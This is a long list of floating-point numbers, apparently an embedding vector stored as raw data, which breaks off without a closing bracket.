[ -0.00938919186592102, -0.004213283304125071, -0.00957596953958273, 0.022513946518301964, -0.01034463383257389, 0.024338623508810997, 0.001688186777755618, 0.045343976467847824, -0.05002779886126518, 0.014381914399564266, 0.003184207482263446, 0.014015541411936283, 0.005736242979764938, -0.006296577397733927, 0.048389896750450134, 0.027887407690286636, -0.00653723394498229, -0.011235421523451805, -0.029597146436572075, 0.007672269828617573, -0.019266881048679352, 0.04057395085692406, -0.018189314752817154, 0.03537290170788765, 0.0007857251912355423, 0.011975349858403206, 0.004040872678160667, 0.00911620818078518, -0.022284064441919327, -0.020028360188007355, 0.02048812247812748, 0.013641986064612865, 0.0032704127952456474, 0.01843356341123581, 0.020646164193749428, 0.012399192899465561, 0.03252812474966049, 0.05040135234594345, -0.02892187237739563, -0.016623251140117645, -0.0033602099865674973, -0.01166644785553217, -0.013462391681969166, 0.01659451611340046, 0.029827026650309563, 0.04577500373125076, 0.0012032820377498865, 0.009755563922226429, 0.003080042777583003, -0.01659451611340046, 0.013131937943398952, -0.02843337506055832, 0.0037786648608744144, -0.04290149360895157, 0.01949676126241684, -0.03646483272314072, 0.023562775924801826, -0.031033901497721672, 0.010639168322086334, 0.011824491433799267, 0.004105526488274336, 0.029539676383137703, -0.026910414919257164, 0.027528218924999237, 0.025559864938259125, 0.06528612971305847, -0.020516857504844666, -0.01371382363140583, 0.02005709521472454, 0.011903512291610241, -0.008462484925985336, -0.017772655934095383, 0.026335712522268295, 0.024970795959234238, -0.012269885279238224, -0.04879218712449074, 0.0001052310544764623, 0.023347264155745506, -0.006278617773205042, 0.013160672970116138, 0.0015247558476403356, 0.014425016939640045, -0.030918961390852928, 0.01517212949693203, -0.018548503518104553, -0.03836134821176529, -0.02189614064991474, -0.058389708399772644, -0.006192412693053484, -0.014705183915793896, -0.011422200128436089, 0.004838271532207727, -0.026493756100535393, -0.013821580447256565, -0.027614424005150795, 0.012154944241046906, -0.021077191457152367, 0.009726828895509243, -0.05623457953333855, 0.01892205886542797, 0.025919053703546524, -0.004259977489709854, -0.01336181815713644, 0.0048777819611132145, 0.021853039041161537, 0.010438023135066032, 0.010517043992877007, -0.03344764932990074, 0.03830387815833092, 0.08384900540113449, -0.004759249743074179, -0.005287257023155689, -0.008024275302886963, -0.03209710121154785, -0.026608696207404137, 0.01495661586523056, -0.009360456839203835, -0.041867032647132874, -0.014970983378589153, 0.04117738828063011, -0.059941403567790985, 0.002602321794256568, 0.009037187322974205, -0.009971077553927898, -0.028476478531956673, 0.04545891657471657, -0.011228238232433796, -0.003976218402385712, 0.010445206426084042, -0.06103333830833435, -0.03939581289887428, -0.00640074210241437, 0.006637806538492441, -0.007528594695031643, 0.04922321438789368, 0.0061133913695812225, -0.00910902488976717, 0.03183848410844803, -0.008728284388780594, -0.03712574020028114, -0.013728191144764423, 0.006382782477885485, 0.029970701783895493, -0.018261151388287544, -0.008692366071045399, 0.006257066503167152, -0.029151752591133118, 0.010200957767665386, 0.005976899527013302, 0.006666541565209627, 0.013958071358501911, -0.07246990501880646, -0.014899145811796188, 0.012226782739162445, -0.0177870225161314, -0.020243873819708824, 0.005667997058480978, 0.017557142302393913, -0.016005447134375572, -0.005470443516969681, -0.056263312697410583, -0.025832848623394966, 0.034769464284181595, 0.008354728110134602, -0.04338999092578888, -0.0050861113704741, -0.011142032220959663, 0.010136304423213005, -0.0029686943162232637, 0.008318809792399406, -0.042355526238679886, -0.015287069603800774, -0.0210628230124712, 0.024424828588962555, -0.03180974721908569, 0.008103296160697937, -0.00631094491109252, 0.007600432261824608, 0.03359132260084152, 0.00628939364105463, -0.0033386587165296078, 0.003051307750865817, -0.0036888676695525646, -0.01290205679833889, 0.02076110430061817, -0.026709269732236862, -0.014302892610430717, -0.014367546886205673, 0.02346220426261425, -0.03804526478052139, -0.029022444039583206, 0.01737036369740963, 0.0012885893229395151, -0.009216781705617905, 0.001303854864090681, 0.04997032880783081, -0.021249601617455482, -0.006756338756531477, -0.013103202916681767, -0.015014085918664932, 0.03683838993310928, -0.036321159452199936, -0.03818893805146217, -0.03620621934533119, 0.010481125675141811, -0.0072699785232543945, -0.02218349277973175, -0.007507042959332466, 0.028174759820103645, 0.013584515079855919, 0.0018058210844174027, -0.03393614664673805, 0.007119119632989168, -0.050430089235305786, -0.013692271895706654, -0.011846042238175869, 0.004418020602315664, -0.02254268154501915, -0.02288750186562538, -0.03436717018485069, 0.006756338756531477, 0.0006676419288851321, -0.046550851315259933, -0.0014771634014323354, -0.02976955659687519, -0.02771499752998352, -0.04281529039144516, 0.0028088553808629513, 0.013792844489216805, 0.004579655360430479, 0.06103333830833435, -0.03198215737938881, -0.030315523967146873, 0.02544492483139038, 0.00046784323058091104, 0.0006954790442250669, 0.006081064231693745, -0.021508216857910156, -0.007384919095784426, 0.023275425657629967, 0.01652267947793007, 0.018807118758559227, -0.04715428873896599, -0.03063160926103592, -0.0024047682527452707, -0.014525589533150196, -0.011422200128436089, -0.041004978120326996, -0.01956859789788723, 0.015186497010290623, -0.039740633219480515, -0.03962569311261177, 0.009899239987134933, -0.008462484925985336, -0.03339017927646637, 0.022068552672863007, -0.009439478628337383, 0.04155094549059868, 0.012736829929053783, 0.01643647439777851, 0.028232229873538017, 0.035401634871959686, -0.06459648907184601, 0.0318959541618824, 0.001887536491267383, 0.012341722846031189, -0.046751998364925385, 0.001102709211409092, -0.003047715872526169, -0.015143394470214844, 0.041924502700567245, -0.08155019581317902, -0.007672269828617573, 0.05103352665901184, -0.0009455641848035157, -0.0059373886324465275, -0.053705889731645584, 0.048389896750450134, 0.0351717546582222, 0.006440252996981144, 0.01969790644943714, 0.05195304751396179, 0.011723917908966541, 0.021220866590738297, 0.02666616626083851, 0.002760364906862378, 0.05534379184246063, -0.02771499752998352, -0.0034823340829461813, -0.037959057837724686, -0.027901776134967804, -0.00692874938249588, 0.01413766574114561, 0.013203775510191917, -0.0006644990644417703, 0.0021102335304021835, 0.020459387451410294, -0.017614612355828285, -0.0022772562224417925, 0.011608977802097797, -0.05025767907500267, -0.014741103164851665, -0.008950981311500072, 0.01877838373184204, -0.023289794102311134, -0.002086886204779148, 0.00825415551662445, -0.006436660885810852, 0.030430464074015617, -0.03344764932990074, 0.013598882593214512, -0.0513208769261837, 0.02729833871126175, 0.011249789036810398, 0.006555193103849888, -0.0067060524597764015, 0.03126378357410431, 0.0020797024480998516, -0.004529369063675404, -0.0381314679980278, 0.01226270105689764, -0.014504038728773594, -0.024712180718779564, 0.015445113182067871, 0.023921964690089226, -0.014726735651493073, -0.03807399794459343, 0.0011619753204286098, -0.027556953951716423, 0.014460936188697815, 0.0022952156141400337, -0.019654804840683937, -0.029798291623592377, 0.012981078587472439, -0.02863452024757862, -0.04465433582663536, -0.014338811859488487, 0.027758101001381874, 0.04853357374668121, -0.014223871752619743, -0.012557235546410084, -0.00013323655002750456, 0.0018426378956064582, -0.013103202916681767, 0.045688800513744354, -0.0026885271072387695, 0.02120649814605713, 0.012607522308826447, 0.0015490010846406221, 0.0024730139411985874, 0.0009778911480680108, 0.014410649426281452, 0.0031626562122255564, 0.022571416571736336, 0.004629942122846842, -0.02971208654344082, -0.05068870633840561, -0.029324162751436234, 0.029396001249551773, 0.0355740450322628, 0.011831674724817276, -0.008419382385909557, 0.023778289556503296, 0.024194948375225067, 0.006587520241737366, -0.02962588146328926, -0.018663443624973297, 0.00846966914832592, -0.036895859986543655, -0.0024281153455376625, -0.00007408266537822783, 0.017600243911147118, 0.006070288363844156, 0.00533395167440176, -0.03999925032258034, 0.0007152344333007932, 0.011759837158024311, 0.006239107344299555, 0.01616349071264267, 0.020516857504844666, -0.043763548135757446, 0.021005352959036827, 0.016264062374830246, -0.013045732863247395, -0.0045329611748456955, 0.023763922974467278, -0.006084655877202749, -0.004737698473036289, 0.04537271335721016, 0.02757132239639759, -0.03545910492539406, 0.03183848410844803, -0.06356202811002731, -0.04545891657471657, -0.00861334428191185, 0.014841675758361816, -0.02409437671303749, -0.023648982867598534, 0.023447835817933083, -0.02176683396100998, -0.014769838191568851, -0.031723544001579285, 0.0187065452337265, -0.0011907104635611176, -0.0032093508634716272, 0.014884778298437595, -0.012169311754405499, -0.03922340273857117, 0.007449572905898094, 0.004001361783593893, -0.004708963446319103, 0.013929336331784725, -0.04338999092578888, -0.03316029906272888, 0.032212041318416595, 0.033074092119932175, 0.03040172904729843, -0.03577519208192825, 0.0016217367956414819, -0.006077472120523453, -0.030229318886995316, 0.01841919496655464, 0.009971077553927898, -0.025832848623394966, -0.03379246965050697, -0.0362924225628376, 0.019683539867401123, 0.018907692283391953, 0.04040154069662094, -0.017039909958839417, -0.016048550605773926, -0.0223415344953537, 0.017269792035222054, 0.0314936637878418, 0.022815663367509842, -0.026465021073818207, -0.012040004134178162, -0.014561508782207966, -0.022557048127055168, 0.017140483483672142, 0.0022575007751584053, 0.04382101818919182, 0.007435205392539501, -0.04379228129982948, 0.00041890377178788185, 0.030085643753409386, -0.04410836845636368, 0.0015301437815651298, 0.0054021975956857204, 0.02948220632970333, 0.03359132260084152, 0.01893642731010914, -0.012672176584601402, -0.010258428752422333, 0.029941966757178307, -0.013778476975858212, -0.057728804647922516, -0.00021831935737282038, -0.00735618406906724, 0.003907972946763039, -0.01856287010014057, 0.018103109672665596, 0.004762841854244471, -0.018519768491387367, 0.0061852289363741875, 0.013383369892835617, 0.01622096076607704, -0.02410874329507351, 0.003130329307168722, -0.03479819744825363, -0.010150671936571598, -0.008218237198889256, 0.0037140108179301023, 0.033217769116163254, 0.011759837158024311, 0.007521410938352346, 0.022643253207206726, -0.019108837470412254, -0.0032434735912829638, -0.004676636308431625, 0.01800253614783287, -0.017284158617258072, -0.03436717018485069, 0.06327467411756516, 0.009382007643580437, -0.0038397267926484346, 0.0033009438775479794, 0.011537140235304832, 0.0185054000467062, 0.05393576994538307, 0.009913607500493526, 0.02402253821492195, -0.053476009517908096, -0.008994083851575851, 0.0012661400251090527, -0.0013712027575820684, -0.03203962743282318, -0.03850502520799637, 0.030804019421339035, -0.03577519208192825, 0.014884778298437595, -0.06189539283514023, 0.0524415448307991, 0.0197841115295887, 0.049165744334459305, -0.0016118591884151101, -0.012363273650407791, 0.06448154896497726, -0.04359113797545433, -0.031206311658024788, -0.009554418735206127, -0.042010705918073654, 0.004464715253561735, 0.009410742670297623, -0.01652267947793007, 0.004554512444883585, -0.026249507442116737, 0.009769931435585022, 0.04244173318147659, 0.02962588146328926, -0.020258240401744843, -0.004058831837028265, -0.047326698899269104, 0.0302580539137125, 0.006217556074261665, 0.004259977489709854, 0.03551657497882843, 0.009152127429842949, -0.035918865352869034, -0.03672344982624054, -0.020430652424693108, -0.004550920333713293, 0.007345408201217651, 0.06264250725507736, -0.02133580669760704, -0.005312400404363871, -0.009762748144567013, 0.04238426312804222, 0.0056320782750844955, 0.013031365349888802, 0.0010775660630315542, 0.027556953951716423, -0.032786741852760315, 0.007384919095784426, 0.007420837879180908, -0.012571603059768677, -0.019899051636457443, 0.0015319397207349539, 0.013124753721058369, 0.014302892610430717, -0.02055995911359787, -0.0026166895404458046, 0.018304254859685898, 0.010517043992877007, 0.012744014151394367, -0.02502826601266861, 0.04410836845636368, 0.029051179066300392, -0.014899145811796188, 0.031235046684741974, 0.00007133262261049822, 0.012744014151394367, -0.0016522678779438138, 0.012284252792596817, -0.022571416571736336, -0.018821485340595245, -0.011608977802097797, 0.02623514086008072, -0.03140745684504509, -0.00042765901889652014, 0.0032883721869438887, -0.008088928647339344, -0.01134317833930254, -0.021996714174747467, -0.00013188959565013647, 0.0005908653838559985, -0.0048203119076788425, -0.023706452921032906, -0.006325312424451113, 0.008642079308629036, 0.0337349995970726, -0.01158742606639862, -0.02247084304690361, 0.03686712682247162, 0.001105403178371489, -0.03083275444805622, 0.006389966234564781, -0.008907878771424294, -0.00033494344097562134, -0.01999962516129017, -0.0038612782955169678, -0.019238146021962166, -0.02374955452978611, -0.0006555193103849888, -0.002341910032555461, -0.011652080342173576, -0.002561015309765935, 0.022528313100337982, 0.05175190418958664, -0.018519768491387367, 0.006907198112457991, 0.025215044617652893, 0.00701854657381773, 0.00038971970207057893, -0.003415884217247367, 0.006512090563774109, -0.00391874834895134, 0.02310301549732685, 0.008053010329604149, 0.013203775510191917, -0.019654804840683937, 0.03600507229566574, 0.0513208769261837, -0.007578880991786718, -0.005208235699683428, 0.0026130976621061563, 0.012873321771621704, -0.0015292457537725568, -0.0118101229891181, 0.012830219231545925, 0.009044370613992214, -0.02742764726281166, -0.0012832015054300427, -0.017628980800509453, -0.007338224444538355, 0.0597115233540535, -0.026350080966949463, -0.022097287699580193, -0.0021084374748170376, -0.024582872167229652, 0.0002774732420220971, 0.0024909733328968287, 0.010373368859291077, -0.014152033254504204, 0.008922246284782887, 0.02948220632970333, -0.01262188982218504, -0.0013721006689593196, -0.0017878615763038397, -0.013131937943398952, -0.00604155333712697, 0.01643647439777851, 0.0031518805772066116, 0.02560296840965748, 0.0002855549973901361, -0.008261339738965034, -0.005653629545122385, 0.01400117389857769, 0.007180181331932545, 0.03419476002454758, -0.0011116889072582126, 0.01147967018187046, 0.010093201883137226, 0.002101253718137741, -0.004180956166237593, -0.006752747111022472, 0.041579678654670715, 0.029022444039583206, -0.0019827215000987053, -0.0029561228584498167, -0.02445356547832489, 0.02594778873026371, -0.00710834376513958, -0.008246972225606441, 0.04686693847179413, -0.0030997982248663902, -0.0012239353964105248, 0.021163396537303925, -0.009216781705617905, 0.02672363631427288, 0.0003080042952205986, -0.0023526856675744057, -0.0053734625689685345, -0.0010533208260312676, -0.021019721403717995, 0.002771140541881323, -0.004708963446319103, 0.019223777577280998, -0.006235515233129263, 0.003947483375668526, -0.007219692226499319, 0.019626067951321602, -0.0314936637878418, 0.016709456220269203, 0.03787285462021828, -0.016206592321395874, -0.02403690665960312, -0.0016441860934719443, 0.006515682674944401, 0.009259884245693684, 0.0037463377229869366, 0.03861996531486511, 0.061148278415203094, 0.014015541411936283, -0.009662175551056862, 0.015761198475956917, 0.005197459831833839, 0.020401915535330772, -0.025430558249354362, -0.018203681334853172, -0.03574645519256592, -0.0022018265444785357, -0.01020814199000597, -0.00875701941549778, 0.007945253513753414, -0.0008032356854528189, 0.010739740915596485, -0.009935158304870129, -0.0077943941578269005, 0.015014085918664932, 0.006292985286563635, 0.0004139649390708655, -0.0028142433147877455, 0.02418058179318905, -0.015042821876704693, -0.04643591120839119, 0.022240962833166122, 0.016766926273703575, -0.03439590707421303, -0.009065922349691391, -0.010495493188500404, 0.008670814335346222, -0.003295555943623185, -0.03471199423074722, -0.008261339738965034, -0.021436380222439766, 0.02566043846309185, 0.03226951137185097, -0.026824209839105606, 0.010797210969030857, -0.026536859571933746, -0.01371382363140583, 0.02461160719394684, -0.013196591287851334, -0.04813128337264061, 0.014798573218286037, 0.017844492569565773, 0.0011009132722392678, -0.008024275302886963, 0.00012874668755102903, -0.01744220219552517, -0.0003827604232355952, -0.029453471302986145, -0.011012724600732327, 0.01183885894715786, -0.03178101405501366, -0.013800028711557388, 0.008843225426971912, -0.026465021073818207, -0.01453277375549078, -0.028806930407881737, 0.0064294771291315556, 0.017686450853943825, -0.011874777264893055, -0.006174453068524599, 0.019970890134572983, 0.01262188982218504, -0.0067635225132107735, -0.001853413530625403, -0.0032758007291704416, 0.014899145811796188, 0.015057189390063286, 0.004216874949634075, 0.009726828895509243, 0.02068926766514778, 0.0008916858932934701, 0.003940299618989229, -0.012629074044525623, -0.011968166567385197, -0.009669358842074871, -0.005563832353800535, -0.029223589226603508, -0.021522585302591324, 0.0022305615711957216, -0.0029327755328267813, -0.004780801013112068, -0.013965255580842495, 0.0077512916177511215, -0.003958259243518114, 0.00462635001167655, -0.003022572724148631, -0.011608977802097797, 0.027413278818130493, 0.04775772616267204, 0.010121936909854412, 0.018275519832968712, -0.00355417188256979, -0.015330172143876553, 0.00920959748327732, -0.013275613076984882, -0.017284158617258072, -0.025143206119537354, 0.026465021073818207, 0.024841489270329475, 0.021149028092622757, -0.03353385254740715, 0.00033808633452281356, 0.02389322966337204, 0.004400060977786779, 0.0015615727752447128, 0.01915193907916546, 0.024410462006926537, -0.031292516738176346, 0.04422330856323242, 0.016608884558081627, -0.0018156986916437745, -0.02692478336393833, 0.006986219435930252, -0.026134567335247993, 0.017284158617258072, -0.019094469025731087, -0.006587520241737366, -0.007557329721748829, -0.01964043639600277, 0.00494243623688817, 0.00517590856179595, 0.008211052976548672, 0.0004128424625378102, 0.0018623932264745235, 0.035688985139131546, -0.013699456118047237, 0.01321814302355051, 0.02283003181219101, -0.004658677149564028, 0.022786928340792656, -0.0005455177742987871, 0.035257961601018906, 0.0066916849464178085, 0.02232716791331768, 0.028260964900255203, -0.018189314752817154, -0.022068552672863007, -0.03382120653986931, 0.015976712107658386, -0.02155132032930851, 0.030746549367904663, 0.006318128667771816, 0.012499765492975712, -0.009856137447059155, 0.03982684016227722, -0.007022138684988022, 0.02339036576449871, 0.00026849351706914604, 0.01101990882307291, -0.0013469575205817819, 0.014152033254504204, -0.003600866300985217, 0.008534322492778301, -0.016982439905405045, -0.013828763738274574, 0.014827308245003223, 0.02494206093251705, 0.029654616490006447, 0.02515757456421852, -0.0018947202479466796, -0.012413560412824154, 0.01976974494755268, 0.011256973259150982, 0.00695030065253377, -0.01693933829665184, 0.01652267947793007, -0.011608977802097797, -0.019741009920835495, -0.015904873609542847, 0.025186309590935707, -0.025128839537501335, -0.012356090359389782, -0.043993428349494934, -0.0197841115295887, -0.025861583650112152, -0.029237957671284676, -0.034051086753606796, 0.032643064856529236, -0.012830219231545925, 0.008347544819116592, 0.034424640238285065, -0.0175858773291111, -0.002602321794256568, 0.0007367857615463436, -0.009281435050070286, 0.008426566608250141, 0.009310170076787472, -0.04735543578863144, -0.005915837362408638, 0.023289794102311134, -0.010588881559669971, 0.007442389149218798, -0.01793069764971733, 0.013131937943398952, -0.02020077034831047, -0.006228331476449966, -0.0029471430461853743, -0.0038576864171773195, -0.021350175142288208, -0.008979716338217258, 0.015976712107658386, 0.0022754601668566465, 0.0028573458548635244, 0.011041459627449512, -0.002528688171878457, -0.010890600271522999, -0.02432425692677498, -0.004389285575598478, -0.046464648097753525, 0.02879256382584572, -0.01257878728210926, 0.0017061461694538593, -0.0003690663434099406, 0.00946821365505457, 0.019252512603998184, 0.013160672970116138, 0.0318959541618824, -0.014654898084700108, 0.013282797299325466, 0.004985538776963949, -0.015761198475956917, -0.031522396951913834, -0.01158742606639862, 0.02622077241539955, 0.03425223007798195, -0.01436036266386509, 0.016106020659208298, -0.04304517060518265, 0.007237651851028204, -0.009769931435585022, -0.01913757249712944, -0.014475303702056408, -0.03180974721908569, 0.01616349071264267, 0.01807437464594841, 0.0032147385645657778, 0.005606934893876314, 0.008850408717989922, -0.0179450660943985, -0.020229505375027657, 0.002957918681204319, 0.023792658001184464, 0.011278524063527584, -0.026896048337221146, -0.016996808350086212, 0.0000668427674099803, 0.005377054214477539, 0.007815945893526077, -0.03034425899386406, 0.03804526478052139, 0.018246784806251526, 0.034424640238285065, -0.002564607188105583, 0.019252512603998184, -0.00030531035736203194, -0.004917292855679989, -0.00373915396630764, 0.02693914994597435, -0.008850408717989922, -0.021536951884627342, 0.010639168322086334, -0.014195135794579983, -0.005046600941568613, -0.03241318464279175, 0.020229505375027657, -0.006321720778942108, 0.02260015159845352, -0.017255423590540886, -0.0009994424181059003, -0.008994083851575851, 0.009475396946072578, -0.019511127844452858, 0.02785867266356945, -0.023519674316048622, -0.022815663367509842, 0.012772749178111553, 0.027829937636852264, -0.011551507748663425, 0.03183848410844803, -0.01481294073164463, 0.04387848824262619, 0.0036493567749857903, -0.027542587369680405, 0.005890693981200457, -0.010014180094003677, -0.038390085101127625, -0.01800253614783287, 0.0207036342471838, -0.00455810409039259, 0.039654430001974106, -0.039453282952308655, -0.009978260844945908, 0.012945159338414669, 0.011501220986247063, 0.011213869787752628, 0.039367079734802246, 0.002544851740822196, -0.0014618978602811694, -0.014913513325154781, -0.015502583235502243, 0.020430652424693108, -0.007715372834354639, -0.019180674105882645, -0.01589050702750683, -0.013641986064612865, -0.019252512603998184, 0.01764334738254547, -0.00892943050712347, -0.003446415299549699, -0.004392877221107483, -0.01823241636157036, 0.009906423278152943, -0.0015813281061127782, 0.0216231569647789, -0.012471030466258526, -0.01589050702750683, 0.003051307750865817, 0.02614893577992916, -0.018807118758559227, 0.023720819503068924, 0.03879237547516823, 0.01152277272194624, 0.012550052255392075, 0.029237957671284676, 0.009374824352562428, -0.015502583235502243, -0.003681683912873268, 0.004920884966850281, 0.006907198112457991, -0.004249202087521553, 0.0050861113704741, -0.03577519208192825, 0.009920790791511536, 0.010581698268651962, 0.018318621441721916, 0.02430988848209381, -0.013146305456757545, -0.009540051221847534, 0.00033516791881993413, -0.015588788315653801, -0.0038720539305359125, -0.0026723637711256742, -0.002345501910895109, -0.0309764314442873, 0.05175190418958664, 0.04893586412072182, -0.008009906858205795, 0.003478742204606533, 0.012090290896594524, 0.002589750336483121, -0.01436036266386509, 0.007000586949288845, 0.030602874234318733, 0.0362924225628376, -0.025473659858107567, 0.0030746550764888525, -0.008333177305758, 0.03295915201306343, -0.004673044662922621, 0.04600488394498825, -0.02402253821492195, 0.017111748456954956, -0.038734905421733856, 0.007345408201217651, -0.0019180674571543932, -0.00928861927241087, -0.0004916394827887416, -0.01652267947793007, -0.025128839537501335, 0.004073199350386858, 0.005545873194932938, 0.0018983121262863278, 0.013153488747775555, 0.0033314749598503113, 0.025631703436374664, 0.007880599237978458, 0.008922246284782887, 0.0029255917761474848, -0.025689173489809036, 0.016982439905405045, -0.013282797299325466, -0.0005221705068834126, -0.01354141253978014, -0.008369095623493195, -0.0017869636649265885, 0.0036421730183064938, -0.02076110430061817, 0.0033655979204922915, -0.008900695480406284, -0.007165813818573952, -0.016479576006531715, -0.027628792449831963, -0.02275819331407547, -0.0038505024276673794, -0.007341816555708647, -0.022801296785473824, -0.010193774476647377, -0.030028171837329865, 0.025473659858107567, 0.005157949402928352, 0.011910696513950825, 0.0009787891758605838, 0.07867668569087982, -0.014295709319412708, 0.011450935155153275, 0.0023203587625175714, -0.031062636524438858, -0.013009813614189625, 0.022442108020186424, -0.021436380222439766, 0.009511316195130348, -0.012075923383235931, 0.021034087985754013, 0.018677810207009315, -0.016422105953097343, 0.011745469644665718, 0.02261451818048954, 0.04953930154442787, -0.013663536868989468, -0.002744201337918639, 0.02196797914803028, 0.026852944865822792, 0.004813128150999546, 0.011910696513950825, -0.00875701941549778, -0.011142032220959663, 0.020603062584996223, -0.005948164500296116, -0.0039941780269145966, -0.025272514671087265, -0.04005672037601471, 0.004475490655750036, -0.010912152007222176, 0.0030890225898474455, -0.0300569087266922, -0.0033943329472094774, -0.020789839327335358, 0.005089703481644392, 0.045746270567178726, 0.024123111739754677, 0.00783749669790268, -0.019338717684149742, -0.014769838191568851, -0.013627618551254272, -0.005667997058480978, -0.003543396247550845, 0.003200371051207185, -0.004629942122846842, 0.0017357792239636183, -0.007208916358649731, -0.014389097690582275, 0.007801577914506197, 0.004597614984959364, -0.024137478321790695, -0.011515588499605656, 0.02630697749555111, 0.0118101229891181, -0.018605973571538925, -0.011106113903224468, -0.009554418735206127, 0.017054278403520584, -0.011192318983376026, -0.009920790791511536, 0.010107569396495819, 0.012686544097959995, 0.007909334264695644, 0.002681343350559473, 0.0007408266537822783, -0.04543018341064453, -0.01229862030595541, -0.0203444454818964, 0.015459480695426464, 0.0015669605927541852, 0.00014704285422340035, 0.02268635667860508, -0.0025071369018405676, -0.0012805076548829675, -0.00011056275980081409, 0.008900695480406284, 0.02652249112725258, -0.0022610926534980536, 0.002002476714551449, -0.013814396224915981, 0.019266881048679352, -0.01751403883099556, 0.0017259015003219247, -0.01389341801404953, 0.037671707570552826, -0.028375905007123947, -0.0030566956847906113, -0.006167269311845303, -0.004058831837028265, -0.04772898927330971, -0.0002047375455731526, 0.012392008677124977, -0.013060100376605988, 0.014927880838513374, 0.020603062584996223, 0.005010682158172131, -0.02616330236196518, -0.01389341801404953, 0.023232324048876762, -0.023074280470609665, 0.006030777934938669, 0.017700817435979843, -0.028102921321988106, -0.023692084476351738, 0.014690816402435303, 0.005808081012219191, -0.006957484409213066, -0.00637919083237648, 0.004292304627597332, 0.004759249743074179, 0.023217955604195595, 0.0035128651652485132, -0.018591605126857758, 0.01389341801404953, -0.003539804369211197, 0.0003728827286977321, -0.020085830241441727, -0.016106020659208298, -0.01893642731010914, -0.02680984139442444, -0.01708301343023777, -0.018548503518104553, -0.03548784181475639, 0.02920922264456749, -0.010639168322086334, 0.028102921321988106, -0.032930418848991394, 0.02288750186562538, -0.006235515233129263, 0.0016226348234340549, 0.00735618406906724, 0.027542587369680405, -0.0006303761037997901, 0.007079608738422394, -0.008211052976548672, 0.021163396537303925, -0.006781482137739658, -0.0002633302065078169, 0.014518406242132187, -0.013002629391849041, 0.013225327245891094, -0.006709644570946693, 0.03212583437561989, 0.007966804318130016, -0.008419382385909557, -0.03077528439462185, -0.008060193620622158, -0.007571697235107422, 0.013498309999704361, 0.012212414294481277, -0.022844400256872177, 0.01336181815713644, 0.0022772562224417925, 0.033763736486434937, -0.008505587466061115, -0.011573058553040028, -0.024194948375225067, -0.01303854864090681, 0.025746643543243408, -0.0188645888119936, 0.014324444346129894, 0.005890693981200457, -0.05175190418958664, -0.0007327448693104088, 0.009726828895509243, 0.0025233004707843065, 0.00008412871829932556, -0.013828763738274574, 0.011120481416583061, 0.018203681334853172, 0.005272889509797096, 0.015545685775578022, -0.0036062542349100113, 0.0201433002948761, 0.016680721193552017, 0.016048550605773926, -0.017212320119142532, 0.007302305661141872, -0.014130482450127602, 0.002668771892786026, -0.028821298852562904, -0.007420837879180908, -0.012643441557884216, -0.011070194654166698, -0.0039007889572530985, -0.019956521689891815, -0.008340360596776009, -0.03453958407044411, 0.010890600271522999, 0.009949525818228722, 0.022154757753014565, 0.004554512444883585, -0.016709456220269203, 0.01262188982218504, -0.02735580876469612, 0.018807118758559227, -0.02175246551632881, 0.015919242054224014, -0.005571016110479832, 0.000996748567558825, -0.019453657791018486, -0.010646352544426918, -0.01336181815713644, -0.00382895115762949, -0.026134567335247993, -0.009259884245693684, 0.0017483507981523871, -0.005254930350929499, 0.00367809203453362, -0.00025996280601248145, -0.002787304110825062, -0.0027926918119192123, 0.007528594695031643, 0.040803831070661545, 0.0015507970238104463, -0.0118101229891181, -0.025646071881055832, -0.026709269732236862, 0.0005814366741105914, 0.0056356703862547874, -0.01645084097981453, -0.004231242462992668, -0.013685088604688644, -0.01601981371641159, -0.003036940237507224, 0.016465209424495697, -0.015301437117159367, -0.016278430819511414, -0.006494130939245224, -0.01764334738254547, -0.034280966967344284, -0.0012149557005614042, -0.012334538623690605, 0.0035308245569467545, -0.0011332402937114239, -0.003327883081510663, -0.008426566608250141, -0.011393464170396328, -0.006979035679250956, 0.015473848208785057, 0.0026436285115778446, -0.014410649426281452, 0.016206592321395874, -0.001258058357052505, -0.00025637089856900275, 0.00600922666490078, 0.007995539344847202, 0.0031806156039237976, 0.004974762909114361, 0.010588881559669971, 0.0015516950516030192, 0.014575876295566559, -0.0040947506204247475, 0.00020114565268158913, -0.018950793892145157, -0.011580242775380611, -0.025890318676829338, -0.00811048038303852, -0.004507817793637514, 0.04893586412072182, -0.016465209424495697, -0.012061555869877338, 0.012449479661881924, -0.00023549307661596686, 0.02374955452978611, -0.002776528475806117, 0.007420837879180908, -0.02879256382584572, 0.011249789036810398, -0.006698868703097105, -0.023792658001184464, 0.0001885740493889898, -0.026967884972691536, 0.00391874834895134, -0.006630622781813145, -0.02614893577992916, -0.0040229130536317825, -0.0309764314442873, 0.014223871752619743, 0.004615574609488249, 0.008354728110134602, 0.025861583650112152, -0.01645084097981453, -0.001547205145470798, -0.008318809792399406, -0.031177576631307602, -0.01715485006570816, -0.030861491337418556, -0.03545910492539406, -0.004712555557489395, 0.012600338086485863, 0.015761198475956917, -0.007040097843855619, 0.018907692283391953, -0.0029255917761474848, 0.011264156550168991, 0.02828969992697239, 0.00811048038303852, -0.005233379080891609, -0.003529028734192252, 0.028691990301012993, -0.012844586744904518, 0.008692366071045399, -0.0037283783312886953, -0.008555874228477478, -0.009690910577774048, -0.0018201885977759957, 0.028835665434598923, 0.007744107861071825, -0.013289980590343475, -0.02012893371284008, -0.035918865352869034, -0.009985445067286491, 0.0032722088508307934, -0.01623532734811306, -0.015933608636260033, 0.020732369273900986, -0.021666260436177254, -0.013728191144764423, 0.009935158304870129, -0.024841489270329475, -0.013548596762120724, 0.0021353766787797213, -0.014274157583713531, 0.011264156550168991, -0.019108837470412254, 0.01659451611340046, 0.010337449610233307, -0.0028878769371658564, 0.021177763119339943, -0.0015849199844524264, -0.001241894788108766, 0.018663443624973297, -0.02212602272629738, -0.01780139096081257, 0.011508405208587646, 0.004680228419601917, 0.004069607704877853, 0.013972438871860504, -0.037959057837724686, -0.002589750336483121, -0.004058831837028265, -0.009439478628337383, 0.013131937943398952, -0.022154757753014565, 0.023289794102311134, -0.004989130422472954, -0.017743920907378197, -0.007040097843855619, 0.0004687412001658231, -0.02423805184662342, 0.01785886101424694, 0.01318222377449274, 0.014755470678210258, 0.021465115249156952, 0.021723730489611626, 0.00446830689907074, 0.027341442182660103, -0.012981078587472439, 0.00708679249510169, 0.007729740347713232, -0.024712180718779564, -0.0007745005423203111, -0.014590243808925152, -0.02601962722837925, -0.000026434041501488537, -0.012708094902336597, -0.0022323576267808676, -0.005944572389125824, 0.01485604327172041, -0.03284421190619469, 0.018591605126857758, -0.012190863490104675, 0.000982381054200232, 0.00597330741584301, 0.02373518794775009, -0.021709363907575607, -0.010100385174155235, 0.037039536982774734, -0.029108649119734764, 0.011932247318327427, 